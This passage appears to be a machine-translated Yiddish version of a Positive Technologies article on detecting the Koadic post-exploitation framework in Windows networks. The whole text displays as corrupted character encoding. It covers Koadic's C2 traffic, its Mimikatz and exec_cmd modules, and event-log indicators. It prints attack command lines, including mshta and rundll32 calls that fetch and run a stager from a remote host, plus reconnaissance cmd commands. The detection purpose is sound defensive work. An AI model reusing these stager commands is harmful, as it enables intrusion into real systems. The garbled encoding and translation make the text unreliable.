ื‘ืึทื–ื™ืจื˜ ืื•ื™ืฃ ื“ืขืจ ืขื ื˜ืคืขืจ ื‘ื™ื™ึทื˜ืขื•ื•ื“ื™ืง WS, ืขืก ื•ื•ืขืจื˜ ืงืœืึธืจ ืึทื– ื“ื•ืจื›ืคื™ืจื•ื ื’ ืึทืงืขืจื– ื“ื•ืจืš WScript.Shell, ืื•ืŸ ื“ื™ ื•ื•ืขืจื™ืึทื‘ืึทืœื– STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE ืึทื ื˜ื”ืึทืœื˜ืŸ ืฉืœื™ืกืœ ืื™ื ืคึฟืึธืจืžืึทืฆื™ืข ื•ื•ืขื’ืŸ ื“ื™ ืคึผืึทืจืึทืžืขื˜ืขืจืก ืคื•ืŸ ื“ืขื ืงืจืึทื ื˜ ืกืขืกื™ืข. ื“ืึธืก ืื™ื– ื“ืขืจ ืขืจืฉื˜ืขืจ ื‘ืขื˜ืŸ-ืขื ื˜ืคืขืจ ืคึผืึธืจ ืื™ืŸ ืึท ื”ื˜ื˜ืคึผ ืงืฉืจ ืžื™ื˜ ืึท CnC ืกืขืจื•ื•ืขืจ. ืกืึทื‘ืกืึทืงื•ื•ืึทื ื˜ ืจื™ืงื•ื•ืขืก ื–ืขื ืขืŸ ื’ืœื™ื™ึทืš ืฉื™ื™ึทื›ื•ืช ืฆื• ื“ื™ ืคืึทื ื’ืงืฉืึทื ืึทืœื™ื˜ื™ ืคื•ืŸ ื“ื™ ื’ืขืจื•ืคึฟืŸ ืžืึทื“ื–ืฉื•ืœื– (ื™ืžืคึผืœืึทื ืฅ). ื›ืœ ืงืึธืึทื“ื™ืง ืžืึทื“ื–ืฉื•ืœื– ืึทืจื‘ืขื˜ ื‘ืœื•ื™ื– ืžื™ื˜ ืึทืŸ ืึทืงื˜ื™ื•ื• ืกืขืกื™ืข ืžื™ื˜ CnC.

ืžื™ืžื™ืงืึทื˜ื–

ืคึผื•ื ืงื˜ ื•ื•ื™ CME ืึทืจื‘ืขื˜ ืžื™ื˜ Bloodhound, Koadic ืึทืจื‘ืขื˜ ืžื™ื˜ Mimikatz ื•ื•ื™ ืึท ื‘ืึทื–ื•ื ื“ืขืจ ืคึผืจืึธื’ืจืึทื ืื•ืŸ ื”ืื˜ ืงื™ื™ืคืœ ื•ื•ืขื’ืŸ ืฆื• ืงืึทื˜ืขืจ ืขืก. ื•ื ื˜ืขืจ ืื™ื– ืึท ื‘ืงืฉื”-ืขื ื˜ืคืขืจ ืคึผืึธืจ ืคึฟืึทืจ ื“ืึทื•ื ืœืึธื•ื“ื™ื ื’ ื“ื™ Mimikatz ื™ืžืคึผืœืึทื ื˜.

ื•ื•ื™ ืฆื• ื“ืขื˜ืขืงื˜ ืื ืคืืœืŸ ืื•ื™ืฃ Windows ื™ื ืคืจืึทืกื˜ืจืึทืงื˜ืฉืขืจ: ืœืขืจื ืขืŸ ื”ืขืงืขืจ ืžื›ืฉื™ืจื™ื
ืจื™ื™ืก. 12. ืึทืจื™ื‘ืขืจืคื™ืจืŸ ืžื™ืžื™ืงืึทืฅ ืฆื• ืงืึธืึทื“ื™ืง

ืื™ืจ ืงืขื ื˜ ื–ืขืŸ ื•ื•ื™ ื“ื™ URI ืคึฟืึธืจืžืึทื˜ ืื™ืŸ ื“ืขืจ ื‘ืงืฉื” ืื™ื– ืคืืจืขื ื“ืขืจื˜. ืขืก ืื™ืฆื˜ ื›ึผื•ืœืœ ืึท ื•ื•ืขืจื˜ ืคึฟืึทืจ ื“ื™ csrf ื‘ื™ื™ึทื˜ืขื•ื•ื“ื™ืง, ื•ื•ืึธืก ืื™ื– ืคืึทืจืึทื ื˜ื•ื•ืึธืจื˜ืœืขืš ืคึฟืึทืจ ื“ื™ ืื•ื™ืกื’ืขืงืœื™ื‘ืŸ ืžืึธื“ื•ืœืข. ื”ื™ื˜ ื–ื™ืš ื ื™ืฉื˜ ืฆื• ืื™ืจ ื ืึธืžืขืŸ; ืžื™ืจ ืึทืœืข ื•ื•ื™ืกืŸ ืึทื– CSRF ืื™ื– ื™ื•ื–ืฉืึทื•ื•ืึทืœื™ ืคืืจืฉื˜ืื ืขืŸ ืึทื ื“ืขืจืฉ. ื“ืขืจ ืขื ื˜ืคืขืจ ืื™ื– ื’ืขื•ื•ืขืŸ ื“ืขืจ ื–ืขืœื‘ื™ืงืขืจ ื”ื•ื™ืคึผื˜ ื’ื•ืฃ ืคื•ืŸ ืงืึธืึทื“ื™ืง, ืฆื• ื•ื•ืึธืก ืงืึธื“ ืฉื™ื™ืš ืฆื• ืžื™ืžื™ืงืึทืฅ ืื™ื– ื’ืขื•ื•ืขืŸ ืฆื•ื’ืขื’ืขื‘ืŸ. ืขืก ืื™ื– ื’ืึทื ืฅ ื’ืจื•ื™ืก, ืึทื–ื•ื™ ืœืึธื–ืŸ ืก ืงื•ืง ืื™ืŸ ื“ื™ ื”ื•ื™ืคึผื˜ ืคื•ื ืงื˜ืŸ. ื“ืึธ ืžื™ืจ ื”ืึธื‘ืŸ ื“ื™ Mimikatz ื‘ื™ื‘ืœื™ืึธื˜ืขืง ืงืึธื“ืขื“ ืื™ืŸ base64, ืึท ืกื™ืจื™ืึทืœื™ื™ื–ื“ .NET ืงืœืึทืก ื•ื•ืึธืก ื•ื•ืขื˜ ืึทืจื™ื™ึทื ืฉืคึผืจื™ืฆืŸ ืขืก, ืื•ืŸ ืึทืจื’ื•ืžืขื ื˜ืŸ ืฆื• ืงืึทื˜ืขืจ Mimikatz. ื“ืขืจ ื“ื•ืจื›ืคื™ืจื•ื ื’ ืจืขื–ื•ืœื˜ืึทื˜ ืื™ื– ื˜ืจืึทื ืกืžื™ื˜ื˜ืขื“ ืื™ื‘ืขืจ ื“ื™ ื ืขืฅ ืื™ืŸ ืงืœืึธืจ ื˜ืขืงืกื˜.

ื•ื•ื™ ืฆื• ื“ืขื˜ืขืงื˜ ืื ืคืืœืŸ ืื•ื™ืฃ Windows ื™ื ืคืจืึทืกื˜ืจืึทืงื˜ืฉืขืจ: ืœืขืจื ืขืŸ ื”ืขืงืขืจ ืžื›ืฉื™ืจื™ื
ืจื™ื™ืก. 13. ืจืขื–ื•ืœื˜ืึทื˜ ืคื•ืŸ ืคืœื™ืกื ื“ื™ืง ืžื™ืžื™ืงืึทืฅ ืื•ื™ืฃ ืึท ื•ื•ื™ื™ึทื˜ ืžืึทืฉื™ืŸ

ืขืงืกืขืง_ืงืžื“

Koadic ืื•ื™ืš ื”ืื˜ ืžืึทื“ื–ืฉื•ืœื– ื•ื•ืึธืก ืงืขื ืขืŸ ื•ื™ืกืคื™ืจืŸ ืงืึทืžืึทื ื“ื– ืจื™ืžืึธื•ื˜ืœื™. ื“ืึธ ืžื™ืจ ื•ื•ืขืœืŸ ื–ืขืŸ ื“ื™ ื–ืขืœื‘ืข URI ื“ื•ืจ ืื•ืคึฟืŸ ืื•ืŸ ื“ื™ ื‘ืึทืงืึทื ื˜ ื•ื•ืขืจื™ืึทื‘ืึทืœื– ืคื•ืŸ ืกื™ื“ ืื•ืŸ csrf. ืื™ืŸ ื“ืขื ืคืึทืœ ืคื•ืŸ ื“ื™ exec_cmd ืžืึธื“ื•ืœืข, ืงืึธื“ ืื™ื– ืžื•ืกื™ืฃ ืฆื• ื“ืขื ื’ื•ืฃ ื•ื•ืึธืก ืื™ื– ื˜ื•ื™ื’ืขื•ื•ื“ื™ืง ืคื•ืŸ ืขืงืกืึทืงื™ื•ื˜ื™ื ื’ ืฉืึธืœ ืงืึทืžืึทื ื“ื–. ื•ื ื˜ืขืจ ืื™ื– ื’ืขื•ื•ื™ื–ืŸ ืึทื–ืึท ืงืึธื“ ืงืึทื ื˜ื™ื™ื ื“ ืื™ืŸ ื“ื™ ื”ื˜ื˜ืคึผ ืขื ื˜ืคืขืจ ืคื•ืŸ ื“ื™ CnC ืกืขืจื•ื•ืขืจ.

ื•ื•ื™ ืฆื• ื“ืขื˜ืขืงื˜ ืื ืคืืœืŸ ืื•ื™ืฃ Windows ื™ื ืคืจืึทืกื˜ืจืึทืงื˜ืฉืขืจ: ืœืขืจื ืขืŸ ื”ืขืงืขืจ ืžื›ืฉื™ืจื™ื
ืจื™ื™ืก. 14. ื™ืžืคึผืœืึทื ื˜ ืงืึธื“ ืขืงืกืขืง_ืงืžื“

ื“ื™ GAWTUUGCFI ื‘ื™ื™ึทื˜ืขื•ื•ื“ื™ืง ืžื™ื˜ ื“ื™ ื‘ืึทืงืึทื ื˜ืข WS ืึทื˜ืจื™ื‘ื™ื•ื˜ ืื™ื– ืคืืจืœืื ื’ื˜ ืคึฟืึทืจ ืงืึธื“ ื“ื•ืจื›ืคื™ืจื•ื ื’. ืžื™ื˜ ื–ื™ื™ึทืŸ ื”ื™ืœืฃ, ื“ื™ ื™ืžืคึผืœืึทื ื˜ ืจื•ืคื˜ ื“ื™ ืฉืึธืœ, ืคึผืจืึทืกืขืกื™ื ื’ ืฆื•ื•ื™ื™ ืฆื•ื•ื™ื™ื’ืŸ ืคื•ืŸ ืงืึธื“ - shell.exec ืžื™ื˜ ื“ื™ ืฆื•ืจื™ืงืงื•ืžืขืŸ ืคื•ืŸ ื“ื™ ืจืขื–ื•ืœื˜ืึทื˜ ื“ืึทื˜ืŸ ื˜ื™ื™ึทืš ืื•ืŸ shell.run ืึธืŸ ืฆื•ืจื™ืงืงื•ืžืขืŸ.

Koadic ืื™ื– ื ื™ืฉื˜ ืึท ื˜ื™ืคึผื™ืฉ ื’ืขืฆื™ื™ึทื’, ืึธื‘ืขืจ ืขืก ื”ืื˜ ื–ื™ื™ืŸ ืื™ื™ื’ืขื ืข ืึทืจื˜ืึทืคืึทืงืฅ ื“ื•ืจืš ื•ื•ืึธืก ืขืก ืงืขื ืขืŸ ื–ื™ื™ืŸ ื’ืขืคึฟื•ื ืขืŸ ืื™ืŸ ืœืึทื“ื–ืฉื™ื˜ืึทืžืึทื˜ ืคืึทืจืงืขืจ:

  • ืกืคึผืขืฆื™ืขืœืข ืคืึธืจืžื™ืจื•ื ื’ ืคื•ืŸ HTTP ืจื™ืงื•ื•ืขืก,
  • ื ื™ืฆืŸ winHttpRequests API,
  • ืงืจื™ื™ื™ื˜ื™ื ื’ ืึท WScript.Shell ื›ื™ื™ืคืขืฅ ื“ื•ืจืš ActiveXObject,
  • ื’ืจื•ื™ืก ืขืงืกืขืงื•ื˜ืึทื‘ืœืข ื’ื•ืฃ.

ื“ืขืจ ืขืจืฉื˜ ืงืฉืจ ืื™ื– ื™ื ื™ืฉื™ื™ื™ื˜ื™ื“ ื“ื•ืจืš ื“ื™ ืกื˜ืึทื’ืขืจ, ืึทื–ื•ื™ ืขืก ืื™ื– ืžืขื’ืœืขืš ืฆื• ื“ืขื˜ืขืงื˜ ื–ื™ื™ึทืŸ ื˜ืขื˜ื™ืงื™ื™ื˜ ื“ื•ืจืš Windows events. ืคึฟืึทืจ mshta, ื“ืึธืก ืื™ื– ื’ืขืฉืขืขื ื™ืฉ 4688, ื•ื•ืึธืก ื™ื ื“ื™ืงื™ื™ืฅ ื“ื™ ืฉืึทืคื•ื ื’ ืคื•ืŸ ืึท ืคึผืจืึธืฆืขืก ืžื™ื˜ ื“ื™ ืึธื ื”ื™ื™ื‘ ืึทื˜ืจื™ื‘ื™ื•ื˜:

C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6

ื‘ืฉืขืช Koadic ืื™ื– ืคืœื™ืกื ื“ื™ืง, ืื™ืจ ืงืขื ืขืŸ ื–ืขืŸ ืื ื“ืขืจืข 4688 ื’ืขืฉืขืขื ื™ืฉืŸ ืžื™ื˜ ืึทื˜ืจื™ื‘ื™ื•ืฅ ื•ื•ืึธืก ื‘ื™ืฉืœื™ื™ืžืขืก ืงืขืจืึทืงื˜ืขืจื™ื™ื– ืขืก:

rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1

ืคื™ื™ื ื“ื™ื ื’ื–

ื“ื™ ืœืขื‘ืขื“ื™ืง ืึทื•ื•ืขืง ื“ื™ ืœืึทื ื“ ื’ืึทื ื’ ืื™ื– ื’ื™ื™ื ื™ื ื’ ืคึผืึธืคึผื•ืœืึทืจื™ื˜ืขื˜ ืฆื•ื•ื™ืฉืŸ ืงืจื™ืžืึทื ืึทืœื–. ื–ื™ื™ ื ื•ืฆืŸ ื“ื™ ืžื›ืฉื™ืจื™ื ืื•ืŸ ืžืขืงืึทื ื™ื–ืึทืžื– ื’ืขื‘ื•ื™ื˜ ืื™ืŸ Windows ืคึฟืึทืจ ื–ื™ื™ืขืจ ื“ืึทืจืฃ. ืžื™ืจ ื–ืขืŸ ืคืึธืœืงืก ืžื›ืฉื™ืจื™ื Koadic, CrackMapExec ืื•ืŸ Impacket ื ืึธืš ื“ืขื ืคึผืจื™ื ืฆื™ืคึผ ื™ื ืงืจื™ืกื™ื ื’ืœื™ ื“ืขืจืฉื™ื™ึทื ืขืŸ ืื™ืŸ APT ืจื™ืคึผืึธืจืฅ. ื“ื™ ื ื•ืžืขืจ ืคื•ืŸ ืคืึธืจืงืก ืื•ื™ืฃ GitHub ืคึฟืึทืจ ื“ื™ ืžื›ืฉื™ืจื™ื ืื™ื– ืื•ื™ืš ื’ืจืึธื•ื™ื ื’, ืื•ืŸ ื ื™ื™ึทืข ืึธื ืขืก ื–ืขื ืขืŸ ืืจื•ื™ืก (ืขืก ื–ืขื ืขืŸ ืฉื•ื™ืŸ ื•ื•ืขื’ืŸ ืึท ื˜ื•ื™ื–ื ื˜ ืคื•ืŸ ื–ื™ื™ ืื™ืฆื˜). ื“ืขืจ ื’ืึทื ื’ ืื™ื– ื’ื™ื™ื ื™ื ื’ ืคึผืึธืคึผื•ืœืึทืจื™ื˜ืขื˜ ืจืขื›ื˜ ืฆื• ื–ื™ื™ืŸ ืคึผืึทืฉื˜ืขืก: ืึทื˜ืึทืงืขืจื– ื˜ืึธืŸ ื ื™ื˜ ื“ืึทืจืคึฟืŸ ื“ืจื™ื˜-ืคึผืึทืจื˜ื™ื™ ืžื›ืฉื™ืจื™ื; ื–ื™ื™ ื–ืขื ืขืŸ ืฉื•ื™ืŸ ืื•ื™ืฃ ื“ื™ ืžืืฉื™ื ืขืŸ ืคื•ืŸ ื•ื•ื™ืงื˜ื™ืžืก ืื•ืŸ ื”ืขืœืคึฟืŸ ื–ื™ื™ ื‘ื™ื™ืคึผืึทืก ื–ื™ื›ืขืจื”ื™ื™ื˜ ืžื™ื˜ืœืขืŸ. ืžื™ืจ ืคืึธืงื•ืก ืื•ื™ืฃ ืœืขืจื ืขืŸ ื ืขืฅ ืงืึธืžื•ื ื™ืงืึทืฆื™ืข: ื™ืขื“ืขืจ ื’ืขืฆื™ื™ึทื’ ื“ื™ืกืงืจื™ื™ื‘ื“ ืื•ื™ื‘ืŸ ื‘ืœืขื˜ืขืจ ื–ื™ื™ึทืŸ ืื™ื™ื’ืŸ ื˜ืจืึทืกืขืก ืื™ืŸ ื ืขืฅ ืคืึทืจืงืขืจ; ื“ื™ื˜ื™ื™ืœื“ ืœืขืจื ืขืŸ ืคื•ืŸ ื–ื™ื™ ืขืจืœื•ื™ื‘ื˜ ืื•ื ื“ื– ืฆื• ืœืขืจื ืขืŸ ืื•ื ื“ื–ืขืจ ืคึผืจืึธื“ื•ืงื˜ PT Network Attack Discovery ื“ืขื˜ืขืงื˜ ื–ื™ื™, ื•ื•ืึธืก ืœืขืกืึธืฃ ื”ืขืœืคึผืก ืฆื• ืคืึธืจืฉืŸ ื“ื™ ื’ืื ืฆืข ืงื™ื™ื˜ ืคื•ืŸ ืกื™ื™ื‘ืขืจ ื™ื ืกืึทื“ืึทื ืฅ ื™ื ื•ื•ืึทืœื•ื•ื™ื ื’ ื–ื™ื™.

ืžื—ื‘ืจื™ื:

  • ืึทื ื˜ืึธืŸ ื˜ื™ื•ืจื™ืŸ, ื”ื•ื™ืคึผื˜ ืคื•ืŸ ืขืงืกืคึผืขืจื˜ ื‘ืึทื“ื™ื ื•ื ื’ืก ื“ืขืคึผืึทืจื˜ืžืขื ื˜, PT ืขืงืกืคึผืขืจื˜ ื–ื™ื›ืขืจื”ื™ื™ื˜ ืฆืขื ื˜ืขืจ, positive ื˜ืขื˜ืฉื ืึธืœืึธื’ื™ืขืก
  • Egor Podmokov, ืžื•ืžื—ื”, PT ืขืงืกืคึผืขืจื˜ ื–ื™ื›ืขืจื”ื™ื™ื˜ ืฆืขื ื˜ืขืจ, Positive Technologies

ืžืงื•ืจ: www.habr.com

ืœื™ื™ื’ืŸ ืึท ื‘ืึทืžืขืจืงื•ื ื’